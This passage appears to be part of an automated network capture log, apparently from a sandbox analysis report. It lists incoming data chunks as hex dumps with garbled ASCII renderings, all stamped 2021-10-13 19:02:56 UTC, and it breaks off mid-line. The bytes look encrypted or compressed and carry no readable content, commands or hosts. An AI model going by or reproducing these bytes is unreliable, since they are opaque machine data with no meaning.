2021-10-13 19:02:56 UTC	1156	IN	Data Raw: 80 7a 87 3d 05 3e 1d 89 4a 83 6a 8f ca 07 6e ba 48 77 90 e5 d3 44 88 c2 70 31 d1 f0 26 b7 cb ee e4 24 2c f1 60 77 78 35 05 e4 4e 65 37 cc c6 28 23 45 fc 94 26 b7 0b 75 79 0e cf f6 0f d7 cf 33 6d 51 6d 55 61 00 2f b4 95 5a 93 7d f4 86 d8 9e cd be b2 4c ec a2 b4 b8 eb 35 d1 dc 22 36 3b 35 0f 4a 0a 3e bf bd d2 37 a8 c4 eb bf ce 01 d0 9e 2b f4 4d c7 b9 f3 53 fd 4b 83 04 66 16 90 9f 5f 5f 45 b3 8e 56 31 b1 88 da ff 2a 56 c7 e7 ab 20 c2 0c 37 47 8b 39 f0 96 e6 e6 8c d9 ad 6b 81 1b 24 31 4a 81 2a 97 63 0c e9 b9 5d 69 6e d2 dd 79 98 da 73 1d c5 28 f6 60 ec 03 80 57 7e a1 30 a8 94 33 0b 48 07 3e 52 10 ca 20 8c 7e eb e8 42 5d 2c 04 d6 d1 f4 72 bf 0a 83 79 4e f9 c8 8e 14 eb 57 56 46 d6 22 0c 9e 25 72 8c f8 f7 13 f5 20 d3 ad 55 91 36 8a 89 9a 97 0c cb a6 dd ff ef 2c Data Ascii: z=>JjnHwDp1&$,`wx5Ne7(#E&uy3mQmUa/Z}L5"6;5J>7+MSKf__EV1V 7G9k$1Jc]inys(`W~03H>R ~B],ryNWVF"%r U6,
2021-10-13 19:02:56 UTC	1172	IN	Data Raw: 0b 9f 0f d7 d2 bd 1d 59 12 58 75 95 09 04 7a 63 6f 7a b1 1a 7b a4 a4 62 4a 36 37 23 ab c6 cf 8c 5d 6f a9 7f 67 03 a9 a1 a2 42 54 60 00 c6 55 72 03 3b 81 e8 82 25 19 2b 52 74 61 55 09 4b 00 20 00 3c 9a d0 91 df 47 0c ee 68 a3 00 06 8d 9d d8 23 66 be 4e 75 6f 2b 5a 98 5d 85 3f 5f 73 52 e4 b3 91 b1 27 8b 65 73 dd 74 8a e7 c1 f2 89 85 f1 71 89 ef d1 d8 dc ca 18 64 89 60 0d 24 ea 6d db 31 26 3d 91 0f e6 0e a7 8d b9 46 69 fc f6 8a b3 9d 82 73 a3 c5 d3 49 97 ba 1f 3d 09 f5 5e c7 69 70 40 82 da 33 2c ca 0b 7a 21 73 91 1e 42 72 b8 39 09 9a 49 d4 0c 4f ec 72 70 c0 92 c0 33 6a 29 02 1e 85 4b 7d 20 4e ea 39 2e ee dc 81 27 0e 75 f8 80 97 cd dc 08 05 a7 07 88 ad f5 de b0 86 59 06 07 44 e5 10 18 97 0e 84 75 fc 7b 19 65 b2 a3 0f d6 0b 3d b9 4d 00 07 40 40 74 b9 bb ea 68 Data Ascii: YXuzcoz{bJ67#]ogBT`Ur;%+RtaUK <Gh#fNuo+Z]?_sR'estqd`$m1&=FisI=^ip@3,z!sBr9IOrp3j)K} N9.'uYDu{e=M@@th
2021-10-13 19:02:56 UTC	1188	IN	Data Raw: 42 12 88 8e e5 84 bb 35 b4 d5 93 81 20 a1 11 17 6d d1 e5 1e 59 6b 08 69 9b e3 9b 38 cd c8 fd ef 47 1b 4b a1 35 2e 22 75 cf b3 35 06 ba e1 df 67 2e de 28 50 16 13 93 41 43 31 62 1d 54 05 75 c3 be c3 50 1f b7 8e a7 fe 25 81 ab 0e 7b 71 99 3e cc f0 07 a2 1d 85 81 4e 50 46 41 cf ce 39 fd ed 99 55 fd 95 d4 a4 72 ba 23 33 88 d0 22 df c2 e7 c5 ef da 67 16 4a 09 80 e1 61 38 cf 8e cc 53 4d 79 50 9c d5 99 72 81 5a 38 98 0e 63 2d d4 56 40 ba 58 f2 cf d1 d2 c8 ac cf de 5f de 17 ef ed 91 1f 82 ce bf cb c3 55 49 c9 fe be 4a 57 6c b2 b0 90 88 4f 42 3c c1 36 6d 8e d5 dd c0 8c f4 13 ea 8a a9 aa 0b 73 53 ee 69 c9 68 2c 55 46 ae c4 f5 d1 3d 71 10 79 8b f0 d3 e0 b7 ae e9 cf e7 50 4d 2d de 44 30 0d d1 fa f0 52 83 de 22 01 d0 b8 dd 6e 49 5f 3b 83 80 3c c1 17 57 ad c8 b5 9f fd Data Ascii: B5 mYki8GK5."u5g.(PAC1bTuP%{q>NPFA9Ur#3"gJa8SMyPrZ8c-V@X_UIJWlOB<6msSih,UF=qyPM-D0R"nI_;<W
2021-10-13 19:02:56 UTC	1204	IN	Data Raw: e3 6e cc f6 b0 75 89 11 73 24 09 b7 c4 c1 6f 2a 67 47 ed c1 16 ea ee ab 36 34 f8 80 1a f3 6e 3a ac 8d 7f 78 dc c5 21 a2 34 20 d3 0d 34 93 de 19 71 af 07 83 e7 33 a5 3a 1d 08 71 2a a3 58 3b 83 99 b0 e8 5e 07 c4 77 19 50 7e b5 06 aa 0e bb 21 bb e6 47 24 2a 46 0d b7 53 37 8c ad f2 c3 86 70 b4 b6 ce 08 56 5c ad ff 0c 2e 70 d1 1f 78 ca ce 16 f1 2b 5d b3 33 8d 5e 09 fa b4 db 84 8a fe d1 c5 c8 d6 23 ec b1 ba dd 19 79 74 5c 33 ed 75 fb 81 d0 79 85 05 b2 55 2e 77 7a b3 2c a5 76 b2 aa 5d 3f 5f 2e 9c 76 eb 0c 6d a4 e2 e4 18 e1 56 33 a3 0b 16 cf 34 a9 28 9a 78 e9 e7 a4 c0 6c 19 5a 96 fe fb 37 a3 97 29 59 aa 5b 5b a9 83 de 88 c3 74 e7 d3 55 64 65 d4 63 12 dd 8b 2a 68 30 7f a2 f5 05 e1 94 e9 2e ef 30 92 e9 2e 6d 28 6c 25 9a 66 35 14 2b 97 cf d0 f8 b2 aa 82 b5 62 75 68 Data Ascii: nus$ogG64n:x!4 4q3:qX;^wP~!G$FS7pV\.px+]3^#yt\3uyU.wz,v]?_.vmV34(xlZ7)Y[[tUdech0.0.m(l%f5+buh
2021-10-13 19:02:56 UTC	1220	IN	Data Raw: 0d 67 67 bc 0d 82 a2 31 e3 4d d4 00 7f be 3a fd 7b 3b 8f d0 cf a7 b3 97 a2 cd 96 3a 88 56 f7 19 0b 4d 7c 36 20 c8 6b 86 22 20 83 b1 6e 54 22 2e 92 a3 fc bf 13 1c ab 9c 02 c2 f1 fc 76 f6 90 08 a6 15 a2 08 4d 74 59 b7 cd bb f9 24 e3 b3 12 2f ba 86 6b 8f d4 6a 69 5c c3 01 54 db 14 cc ae a8 d5 06 45 69 0f e9 03 64 b5 59 4f 16 7b 8a 70 16 61 24 27 e3 5e a7 4c 44 18 52 be f4 f9 bb 06 b6 fb 59 8b dd ee 8d c4 8b 10 7c 0c 0f b4 fb d8 2b 81 b0 7b 8c 12 6d f6 c8 7b 5d 01 cf 5b da 16 ee 68 0e d9 97 9d e5 77 e0 f6 63 a7 a9 e0 93 47 7b eb ef e3 2f 0e 1f d1 51 8c 69 8c 20 64 74 b8 f3 74 65 27 d2 7e 67 45 f2 36 c9 f7 a7 f7 49 2d f3 8e 9f 8c 23 6a 34 45 79 42 4c d4 f5 1d f0 7c 7b b9 a9 c6 e2 5c 3d cc bc 70 4b 0d f4 ef 36 9a 1e 1b 94 ba fb ff c3 22 bd 5f 1a 0a 44 c4 3e 65 Data Ascii: gg1M:{;:VM\|6 k" nT".vMtY$/kji\TEidYO{pa$'^LDRY\|+{m{][hwcG{/Qi dtte'~gE6I-#j4EyBL\|{\=pK6"_D>e
2021-10-13 19:02:56 UTC	1236	IN	Data Raw: b7 79 24 67 11 8d 1d b2 43 12 11 3d da 58 52 a5 3a 29 5f 60 32 7c 41 4c 06 48 c2 b0 85 c8 bd 1d 89 3e 78 26 c4 a2 44 69 89 1d 4c cb 63 84 18 fd 11 73 3f 3c 81 47 13 4c 1f 48 d8 27 88 74 89 33 8a e7 b0 08 26 3d 67 73 73 1e b6 cd c5 39 9d 84 18 17 c7 4a 53 a5 f9 7a 5a a9 1d 0d e0 9b 0b 35 ec b7 b3 0a 7a 40 09 48 2f 6b 86 e9 be 8f 77 20 46 cc 1d bc 5d a0 af 01 6a 52 90 b6 04 47 06 e9 b3 26 52 2d f5 5c fb 24 a8 d5 1c 06 11 ad 0e 66 bd 6c 3d b8 b5 61 fb c7 7e 72 a2 03 cc f4 20 a1 06 3e d0 57 a6 7a 76 04 51 37 41 d9 8b ac 24 31 13 c8 d3 bc e8 a3 7a 29 d5 b1 75 de 49 ab 71 df 5c f8 5d ed 4a 7c ed f0 86 de 92 d8 b8 ff 38 48 25 a4 d1 ad e9 58 97 73 61 99 39 86 59 0a 46 2e 56 c5 d7 9c e2 fb 94 94 8b 76 9d 78 d9 a6 7b 6c 79 95 07 f4 7e 6e 27 ba 40 98 6c d0 07 73 00 Data Ascii: y$gC=XR:)_`2\|ALH>x&DiLcs?<GLH't3&=gss9JSzZ5z@H/kw F]jRG&R-\$fl=a~r >WzvQ7A$1z)uIq\]J\|8H%Xsa9YF.Vvx{ly~n'@ls
2021-10-13 19:02:56 UTC	1252	IN	Data Raw: 6a 9b 12 fa 3e dc b9 0d 0f 69 5a 54 89 25 71 23 ec a2 12 74 bd 09 a0 7d 60 40 24 dc 9d 3b ea 67 5c 48 7d 3d ef 18 7c 2f ef 8d 88 98 b0 a0 b9 66 70 c5 e0 15 70 00 fd 47 38 26 c9 5e f9 db 1e a4 e9 e2 dd 69 cc 22 3e 25 40 77 b3 b8 de e3 a7 ca 7f 96 a4 e4 f7 e5 00 26 d9 2d 2e 20 2e 4e 81 ed 75 50 98 6e 89 b9 77 cf cb 3a ed e7 6a 91 5e 51 a9 4c fa 16 66 90 cc cb 8e 8a d1 68 69 1d 15 da 49 54 d0 ce 4f 48 b1 31 62 1f 2f 1a 0f d3 94 2b 9b 45 93 2a 4e 09 eb b2 dd 03 c8 be 76 ee f0 0a 94 29 91 75 93 bb b7 00 b1 75 9e 15 e8 19 6b 19 2d fa 68 fa 9b f1 91 ce 1e b4 e9 7a 29 b3 bb 22 b1 f6 a3 fb 93 d5 e4 24 e6 3b f2 8b ff 08 79 01 e2 73 df f3 00 fc 6c da 69 3d 3c a1 21 11 eb e7 9c c4 55 dd 75 09 ac c6 f2 e2 7d 0b 54 ff 5e 01 ae cd 42 2d 1f c0 8d ea 0f 3c f6 84 71 54 51 Data Ascii: j>iZT%q#t}`@$;g\H}=\|/fppG8&^i">%@w&-. .NuPnw:j^QLfhiITOH1b/+E*Nv)uuk-hz)"$;ysli=<!Uu}T^B-<qTQ
2021-10-13 19:02:56 UTC	1268	IN	Data Raw: 05 c7 29 4f e7 76 cc 5a cd d8 a4 d1 ae ca e0 ba fa 8f 4b 1b 18 79 9b d6 08 8a 16 03 ad a9 cb 89 34 70 e6 73 b9 e5 b8 fa 35 ab bc 50 28 49 1e 09 2b 90 04 ee f9 86 71 6d 75 25 1e 0b 33 35 8d 57 9e c6 9c b9 f8 57 57 41 fc e1 f2 5f 70 83 6f 32 fb 17 b7 24 b5 70 f6 cc e1 12 b4 03 91 dd 7a 30 b8 c8 59 bf ec d1 b9 b6 a0 e3 52 69 c5 7d 08 14 5d c9 0c 84 53 d8 16 b6 c6 89 28 d2 b8 dc fc cb 7d fd 1b 94 20 87 ce 9a 7c 1f 6c ef ab 37 3e 44 bf 3c 19 e3 20 d1 1d 6d 50 f9 64 0c f7 96 13 9b e9 b5 5f d6 5e d7 50 16 1c 79 30 bf 3e 10 ff 40 85 60 21 58 ac 42 ba 3d 4b af d6 50 b8 ff ec fa 97 a2 8f 5b 15 c6 c8 9d 0e c6 16 5c a6 be 86 e1 a0 bc 26 5b 64 e9 a5 92 81 7e ef e9 2f dc e1 ab 8f 4d e3 c7 36 7d 28 88 67 86 9d c2 d3 13 08 22 36 6a 17 91 7e 9f ec 58 75 a0 57 27 cd 3a 58 Data Ascii: )OvZKy4ps5P(I+qmu%35WWWA_po2$pz0YRi}]S(} \|l7>D< mPd_^Py0>@`!XB=KP[\&[d~/M6}(g"6j~XuW':X
2021-10-13 19:02:56 UTC	1284	IN	Data Raw: 08 d2 4b 43 25 9a e4 cc 9b 5c 96 70 05 79 fc d3 0d 83 d4 4a 07 7d 05 4e d6 54 44 e9 ac f4 fc 7e a6 45 e6 c5 61 0c 67 e4 48 ce b1 71 a2 1d 01 35 25 10 f5 bf 54 c8 e2 17 a0 93 84 a0 66 40 0f 0c a7 4d 51 8e 30 97 60 5f cf 11 04 18 0d 51 ef d5 4b ef f4 e1 3a b8 53 54 53 af 0c 58 0c d0 61 d4 16 c8 2c 70 59 42 e6 14 4b e5 ea 8f 36 3d d6 9b b6 29 39 81 e2 73 45 65 83 e8 56 8b 97 f8 63 69 94 31 dc a9 87 1f b1 23 1b da 5d 5b dd a7 fb 35 a1 d8 ae 5b ea af 6b 64 b9 98 a5 94 9e 68 88 15 a2 c0 97 a7 47 ee 90 5e 8c 50 02 06 7d 78 1a 66 77 cb 59 39 2b f8 ce a7 8b ee bd ba 1e 33 16 e5 b2 02 d0 5a d9 26 98 3a 47 6a 3f 32 6e 1e 10 fc 7c df 0a 33 b3 9e 38 ce e2 8b 4e 09 b5 d3 75 cf 74 1e 8f 7a 15 e9 a7 61 30 1c ed c2 4a cc 82 fe 77 71 ba 9e f6 17 b6 72 d4 48 5e 50 fe 6d cc Data Ascii: KC%\pyJ}NTD~EagHq5%Tf@MQ0`_QK:STSXa,pYBK6=)9sEeVci1#][5[kdhG^P}xfwY9+3Z&:Gj?2n\|38Nutza0JwqrH^Pm
2021-10-13 19:02:56 UTC	1300	IN	Data Raw: d3 d7 b5 51 41 28 b5 79 81 16 68 f3 c3 97 00 eb 41 a4 5e ae 4e bc 2d ea ce b7 c3 e7 7b 65 7b 46 e2 4c ea 5b be 52 b7 6c 45 0f 24 6d b3 96 f0 ed 93 12 86 b8 89 d9 1a 7e d4 76 c1 33 65 a2 72 6f 77 db 3f 04 5b f4 28 32 d4 60 4e 56 b0 45 6c cc 66 57 3a 75 a3 f4 12 50 3c dd 81 14 8d 67 3f b0 d4 d4 13 c6 74 77 8b 07 0c 89 03 96 cc 25 9e 9d 62 43 48 22 f4 c6 0c 85 01 87 6a 53 ea f0 e0 36 ec 58 18 4a 35 56 60 5e ad 6b c6 cb ef 6c c8 6e cb db c7 ca 9b e3 03 3a 4b ff b3 3a 5c f8 41 e9 c6 32 77 92 7b 44 24 d9 68 08 17 ad ab 88 b4 2e e7 b3 a6 62 3c 69 26 fc b5 37 ef 9a ce d0 f8 37 b3 5f f0 95 fd 9c 6d 28 c0 2c a2 d0 10 34 39 ce f8 8f 83 b0 fe 78 b1 76 4d fd 32 f0 4e 59 1a 89 6d 04 66 21 16 a5 b0 c9 34 c8 09 71 49 f8 50 b6 ca b2 a0 2b f5 02 16 87 3e 26 73 59 da 4c 03 Data Ascii: QA(yhA^N-{e{FL[RlE$m~v3erow?[(2`NVElfW:uP<g?tw%bCH"jS6XJ5V`^kln:K:\A2w{D$h.b<i&77_m(,49xvM2NYmf!4qIP+>&sYL
2021-10-13 19:02:56 UTC	1316	IN	Data Raw: c3 ba 70 5b 12 85 f5 e1 18 25 d3 bd 7a 31 b2 8d e0 82 f4 e3 ed f3 1b 60 a0 82 ab cc 54 9d d2 e1 82 dc 79 82 5e 24 9d b9 42 4d cf 3b 2e ef 35 f5 6d 7f 53 da 17 cd bd 14 f9 c1 09 8c 72 a0 7c fd 4c b8 98 a8 70 48 3c 23 a4 09 8d 84 4d ce 01 85 69 d1 a7 7b fe e0 75 6b a6 24 9d c0 2d b2 2c 9c 74 87 bd 58 4d 62 fd ec 32 07 76 04 21 e1 0e 63 68 f2 38 ae ed a1 96 3a e9 a3 2c 12 c9 d2 9b 32 d0 a9 64 b4 4a cd d6 23 27 2a 39 5b fc 25 3b af 48 c1 f6 54 3a cd c4 10 1a ea 35 19 ee 3d dd e4 0a a7 ab a6 42 a5 33 3d 5c cc 5e ae aa 49 6f 77 e9 ea 09 a5 82 ef b2 3c 6e 34 ff 3f b9 bd c6 c9 07 35 08 8f bf 66 f7 5c 50 86 dc ce 51 86 80 98 62 8b a7 3d 8a e6 23 25 b1 07 52 cd ee f7 4e ff 17 e8 cf b6 c5 43 de de 76 f9 06 1a 7d 2f 9e b3 4d c3 91 96 21 9e 01 cc 50 91 d8 f4 b7 d1 d7 Data Ascii: p[%z1`Ty^$BM;.5mSr\|LpH<#Mi{uk$-,tXMb2v!ch8:,2dJ#'*9[%;HT:5=B3=\^Iow<n4?5f\PQb=#%RNCv}/M!P
2021-10-13 19:02:56 UTC	1332	IN	Data Raw: 8e c0 56 9a dd 03 ad e0 ff b2 f0 1a 46 b8 5e b5 75 74 ac eb ba f2 31 e2 aa ce c8 e3 2b 13 4c 7d d5 ac 82 1e 04 41 f2 c1 d8 ab 10 1b 0e 38 4c 96 59 22 c7 1f df 17 cc 19 75 29 c1 91 d1 a1 a5 72 f9 12 f1 36 b1 88 f9 65 e7 0e 74 81 53 8e 94 71 8a a9 a9 61 8d 8b a5 b3 f6 7c d2 8c 34 84 6e 32 e3 62 82 90 19 0c 2a a8 c3 71 c3 16 d0 57 e1 b5 e2 23 a5 6f e5 76 cd 51 49 9e 30 1f 17 a3 b3 98 1e 88 33 bb 79 fe 8d 3e e2 c0 15 b1 af c1 0f b7 98 0a d5 e7 0e fc 66 f7 e7 7f cc ce 8f bd 76 b4 84 e0 f0 e6 a3 e5 27 a9 11 79 c3 41 78 67 c5 c8 e5 a4 14 07 fb e7 dc af a0 76 e7 d9 ae 21 8d 3b 59 7c 4d c1 10 22 56 4c bd b9 51 06 78 ad ad 33 fc 86 ae 16 0d 18 8b ab 53 76 f4 7f 20 af cf f7 72 9b aa 08 01 00 00 d8 5e 57 1e f9 3f 3e 2c 76 f4 6e a6 2e 47 1b 21 3b 07 38 03 dd 1b 0f c7 Data Ascii: VF^ut1+L}A8LY"u)r6etSqa\|4n2b*qW#ovQI03y>fv'yAxgv!;Y\|M"VLQx3Sv r^W?>,vn.G!;8
2021-10-13 19:02:56 UTC	1348	IN	Data Raw: c7 16 03 20 78 1a 55 c9 b6 8e a4 6e a8 14 a0 f5 ae 2b a1 17 cb c7 c0 63 b3 01 e5 57 b7 47 17 29 70 eb 07 41 77 38 be 57 59 e0 6e 85 c2 81 80 27 be 4e 0a d6 26 2c b8 47 53 8b d4 99 7b 4c aa f4 40 9a f4 03 2e 6f 96 70 76 d5 9e 95 c0 45 06 97 ea 83 60 ed bd ad c6 b0 4a 02 7e fd 11 98 eb 3b 95 c8 5a 5a 65 11 91 be bc 66 c3 81 fe e0 87 b0 0d 92 fb 08 10 e0 2f 2f 94 a4 94 19 7e 25 93 f6 d2 af f2 b3 a8 b7 b6 77 bf 23 7c d0 f3 7b f2 81 91 f5 20 34 7b dc f2 4b 3d f7 34 b0 df 40 59 1b db 06 14 74 a3 ab b6 9b d6 92 16 e1 a1 71 3b a7 f1 a2 63 f6 b0 bc 7e 1f a0 95 a8 a4 9c 34 29 e0 c7 57 28 e6 2f 94 9d 0e 53 a8 bd d1 3f 95 d5 f2 ad 76 78 a3 1d 97 d1 ef b1 c0 68 47 ed 41 3a a2 4e bb 6e e5 ad 0b b3 b3 a9 b5 dc 75 5c d7 65 43 f0 a3 7f cb e3 12 c2 0b a4 c0 ca be d4 fd a1 Data Ascii: xUn+cWG)pAw8WYn'N&,GS{L@.opvE`J~;ZZef//~%w#\|{ 4{K=4@Ytq;c~4)W(/S?vxhGA:Nnu\eC
2021-10-13 19:02:56 UTC	1364	IN	Data Raw: 9c eb 72 5d b1 2a db 5a 52 8f 02 1a 98 03 a9 8e 54 de 1d 21 a6 8e 94 86 f0 92 24 6d 96 93 d0 a2 46 66 29 97 2e b9 3d 9f 3f 98 56 20 8e c9 31 da a0 28 0d 5e af 1e 5e 21 e5 33 84 b9 a1 36 70 73 a6 03 7e ea 29 da 35 bd fc e9 d7 10 92 63 2b df c0 11 9b 14 0e ce a1 1e 9d 69 10 1f 49 bc 50 f4 ad 62 83 61 f1 8e 98 c9 2e 40 8e fd 2d fc 53 00 69 b9 eb 54 f9 c3 3b 0b 05 86 c2 16 3f 1d b4 e5 ed a8 dd 45 af ad 4b d6 f8 28 3e 84 5b e0 bb 2e 4a c2 2f 21 ba dd b1 da 96 b1 1c c2 8e 96 b3 e1 90 d2 15 9e f0 66 c7 bc 5c 71 5d 2d 06 cf c3 d8 9e 28 98 db 3c 01 bc 14 99 6b fc 09 d8 f1 ef a8 07 db 7b 6a 4f 2b 04 c0 4b a7 03 b7 37 ff b8 6e 30 22 ee fa 55 e9 08 ed 5f 70 c2 4e aa 9c f9 55 4f 3e 06 7c 16 61 66 fa 31 bb 94 75 56 6a 16 e5 84 d2 a9 8b 69 e8 c0 a5 e2 3d 1b 19 41 33 37 Data Ascii: r]*ZRT!$mFf).=?V 1(^^!36ps~)5c+iIPba.@-SiT;?EK(>[.J/!f\q]-(<k{jO+K7n0"U_pNUO>\|af1uVji=A37
2021-10-13 19:02:56 UTC	1380	IN	Data Raw: b5 76 5a 90 aa 2f ef a1 dd d2 63 95 4f e3 c7 e4 e8 78 34 db 7e b8 c7 87 ef ac ed 30 29 90 00 fb 63 b2 d1 75 05 ab 83 47 b1 23 d1 2c 73 a8 21 2b ca 3c b2 49 74 56 08 b3 11 88 e2 cc 3c cb 9d d1 0b 94 e3 27 e8 4c 74 8d b4 c3 b2 5b 22 b8 8e 83 3d 86 e1 72 e2 51 0c 3e 07 4d 46 45 ed bb 93 ff 84 53 9d 17 05 ee 60 a3 fa b2 2e 1f d9 9d 79 a2 47 2e 64 01 8f ea ee f2 53 24 92 b5 1a 00 af 06 29 fe 5b bb a9 db 59 7e 4d 60 40 07 5d e8 e0 9f 80 60 9c e1 57 84 c1 e1 cc 79 79 d7 88 4a a6 1d 14 23 02 1b 16 07 e5 25 65 c3 ee 46 3c ec 57 0c 3a 35 90 40 cd d5 ac ad 6c a6 4d c7 60 54 84 35 68 d0 4b c0 b0 0e 3c b6 68 47 18 ca c1 a8 47 cd d7 c9 f4 8e 08 16 6f 40 5f 9e ab 44 f3 b4 5d 55 61 f8 35 58 62 ea 0d 8a 9d 3e 30 7f 38 1f 39 82 14 05 8d 42 29 73 03 ec ae 61 c1 73 b9 34 bc Data Ascii: vZ/cOx4~0)cuG#,s!+<ItV<'Lt["=rQ>MFES`.yG.dS$)[Y~M`@]`WyyJ#%eF<W:5@lM`T5hK<hGGo@_D]Ua5Xb>089B)sas4
2021-10-13 19:02:56 UTC	1396	IN	Data Raw: 16 3e 47 38 31 56 be f5 7b 12 b0 10 a1 27 6f 2c 1a 32 cb 58 e2 ea dc 38 fc 14 9d 7e d2 e6 29 0a 2d 1b 43 83 7f cc b9 e0 bb ae 90 a7 e4 c8 b6 01 58 bc a5 a4 5f 4c eb d6 a5 0c c7 23 aa 12 eb 7d dc ee 6c 0f 3f 8e 4d 51 63 d3 0c 90 a8 83 0c dc ec ae c5 4f 5b ae e6 23 fe 15 a2 a9 c7 ac 32 ae d1 e9 ed c2 ea fe 9a b8 bc 8d 8c cb 89 fd 47 ff 54 e6 83 3a d9 b7 89 14 8c f2 f7 74 3b 52 54 73 7a 6c c5 fc ac e3 a3 7c 9f c8 b5 a0 9a 47 80 ff 6c 19 e3 40 f4 e5 47 9d f2 d5 2e be c5 0f e2 6e b4 1b 58 b6 cd 0d 63 cf 2e 43 7b 7c f5 a9 94 f6 3a 36 d4 12 7d eb d9 a3 c9 da 71 95 42 37 e2 60 4c 3c 88 ad 32 30 e8 c4 bb bb b2 d6 bf b1 d0 54 f0 c9 28 97 cf b2 49 f9 c2 0b 96 ba 24 23 16 bd 0e 43 4f 55 68 10 76 81 74 f0 bc c9 55 6a bc 98 1d a6 59 ba 86 44 6d d3 c2 25 11 8a 4e 67 ab Data Ascii: >G81V{'o,2X8~)-CX_L#}l?MQcO[#2GT:t;RTszl\|Gl@G.nXc.C{\|:6}qB7`L<20T(I$#COUhvtUjYDm%Ng
2021-10-13 19:02:56 UTC	1412	IN	Data Raw: d5 51 14 3a 7e 4d 99 37 57 a6 8a cf 3c 55 31 35 61 fd b6 cc e9 e7 03 31 36 7b ad f3 78 0f 94 86 77 1a cc 0d cb 20 20 8d bb c4 12 d1 50 0e 72 1c a7 ad c3 ef 02 72 83 4a 70 0a 7c 7e d3 31 e4 f1 7f 07 c5 d0 fa 63 a6 df 13 de 76 56 6b 06 06 03 35 ef a6 b7 1d 16 46 7a a4 89 1c 3e d2 0c b8 c2 fe af 5e 4f c2 66 12 4c ec 80 c4 90 02 c8 86 97 4b 92 68 a3 20 5d 59 04 a2 23 fc 19 fd 56 f4 4d 6f c1 cd 9e 0c 41 97 65 02 b2 0a 4c 46 ea 63 1a e3 32 64 6b dd 61 cf 93 29 a2 a7 2c 80 3c 69 c0 30 6a fe bf 70 ca 4b 16 8c a0 ea 9a 63 c8 c6 67 91 d6 47 3a 16 a4 0f 94 e8 c9 cd 94 22 ee 68 07 02 5b 5a 9b f6 cc cb 53 93 52 3f 34 9e 7d 2e 85 58 26 d2 17 be 92 08 19 53 72 b6 06 04 c8 26 88 0a 8a fd e7 a3 88 b2 67 eb 35 26 8b d9 a0 ea f7 80 3a 26 d5 05 d3 3b c4 26 3d 3f c2 bd cc fa Data Ascii: Q:~M7W<U15a16{xw PrrJp\|~1cvVk5Fz>^OfLKh ]Y#VMoAeLFc2dka),<i0jpKcgG:"h[ZSR?4}.X&Sr&g5&:&;&=?
2021-10-13 19:02:56 UTC	1428	IN	Data Raw: 3d cc 0b 1e 36 4d 7c aa 0e 54 0d 27 4c 97 79 ac b3 82 46 a2 c3 bb 97 31 ce ee 9f 34 54 34 ef 73 69 a7 03 4b 7a 9e 45 0f 60 0f 73 df 43 94 f7 71 4d e4 59 90 4f 6e 69 ac 33 23 71 e6 5c 52 3d 61 60 9f cd ac 87 20 f4 49 ff a2 39 9e dd 58 1b 9b b8 72 34 e4 d5 41 5c 64 e9 0d f4 da 75 49 80 62 d8 ff c3 e5 e9 bc c1 b2 70 15 a0 a5 0a 4e 6a 54 c7 4a ad c8 d2 8a 29 93 36 a5 43 af 7b 85 8d 99 af 1f 5d 57 a9 97 7c 91 bd aa 26 cf 2f ad ad 4a d9 79 b6 39 63 c1 a0 3d c4 ef 27 58 2d 73 b2 dc 7e 1e 9c 87 75 0a 16 fa 85 99 20 7b 41 21 07 33 eb 3b ca 6e 7e 53 8c c9 5e 28 43 7d 19 36 86 67 a9 2f c2 7b e3 47 c2 31 19 c2 6a 35 c6 9d e1 b8 c3 d8 2e a0 d9 50 02 0a 67 42 c0 54 cd fd 36 45 54 66 e4 74 13 4a a3 fa 5d bb 38 c5 60 56 3b e2 f4 2f 7d 3d b9 1d 00 14 9f 6d cd 3a 89 99 c4 Data Ascii: =6M\|T'LyF14T4siKzE`sCqMYOni3#q\R=a` I9Xr4A\duIbpNjTJ)6C{]W\|&/Jy9c='X-s~u {A!3;n~S^(C}6g/{G1j5.PgBT6ETftJ]8`V;/}=m:
2021-10-13 19:02:56 UTC	1444	IN	Data Raw: 7c 47 2d b4 5c ae 4f 77 ba b7 78 f3 f6 aa 7c c2 33 6c 80 9a 6e 49 b7 15 e4 6f d7 ee e1 73 ac 68 e5 d5 73 5a 3c b7 a2 e4 0f 0d ff 11 b2 d4 c4 5c 6e 69 c7 02 99 d6 36 3e fa 97 49 fd 38 63 c5 01 b4 bf db d8 9b a1 31 49 af 57 11 19 d8 35 5b 03 a6 42 14 6f 8e ca 58 57 3e 0e 02 eb a3 db 33 4e 16 b0 d6 40 90 f8 38 f2 03 7b c0 7c f8 02 4b ea 22 40 a9 32 c0 26 fd 32 01 6b 4e 4d f6 09 fd 21 0c fa a5 cb 81 6b 51 db 09 73 39 a4 29 0c 1a ce b4 96 9b 34 55 1a 8b cb 4c d5 43 26 95 de bf 2c 4c 34 85 b3 ad 19 23 bc 31 c1 5f 1a 04 9a 17 2e 4f c6 a0 7e ae 21 8e 5b ab d4 36 cc e2 d0 0c 6d d8 e2 e0 e4 9b 62 46 8a 72 61 1c 2b 79 dd 3b 30 7d b9 fb 09 74 bd 4f af 23 de 8f 41 73 da a3 02 ba d1 8f 46 88 d2 d6 1a 81 6b ec b4 10 f6 4d 65 31 52 2d 29 4f b4 0a 70 0b f2 7d 5e 71 f1 05 Data Ascii: \|G-\Owx\|3lnIoshsZ<\ni6>I8c1IW5[BoXW>3N@8{\|K"@2&2kNM!kQs9)4ULC&,L4#1_.O~![6mbFra+y;0}tO#AsFkMe1R-)Op}^q
2021-10-13 19:02:56 UTC	1460	IN	Data Raw: e7 5c b3 ee 60 99 a6 40 24 0c 81 37 5a 10 92 f4 bb a0 c4 98 75 44 3c a3 47 98 70 13 2d ed 7f a6 0a 06 c9 88 2b e3 fa 71 7d 2d 59 da 44 26 f2 e4 a9 9e 19 6b 89 9c da 6f 94 c5 4e 22 80 20 a7 a4 14 67 16 e7 60 25 b7 9b ae 19 34 29 0c 6d e5 b3 f5 e1 c2 a7 65 8a 21 d1 47 6d 9d 63 e2 11 69 5b 48 ca 32 e2 7f 3c 59 74 2b 19 af 5f be 68 c5 9d dc 2e a1 aa 45 e1 55 e8 97 c0 00 36 f1 fd a3 18 ee 35 92 ce ac c3 86 45 75 3e 3b 25 fa 4f 3c 20 de 93 bd 40 f0 97 18 e3 47 e3 9d a4 f7 22 a3 3d 69 a5 f5 ff 26 ee f9 79 03 77 2e ca 12 81 52 62 00 5a 15 2b d4 ac 28 d6 ce b8 a0 05 0b fb 0e ea b2 92 22 c0 ca fa 00 00 85 5e f4 3c e2 63 64 6f 4b fe a3 5a d7 0b b0 e9 99 6c 1b 6c 0f 07 34 ed 07 e7 fd be d1 63 8c 76 af 5b d6 eb 37 ed dd e5 98 1c e6 ec 21 e4 b0 f6 51 59 55 41 c5 2e 2a Data 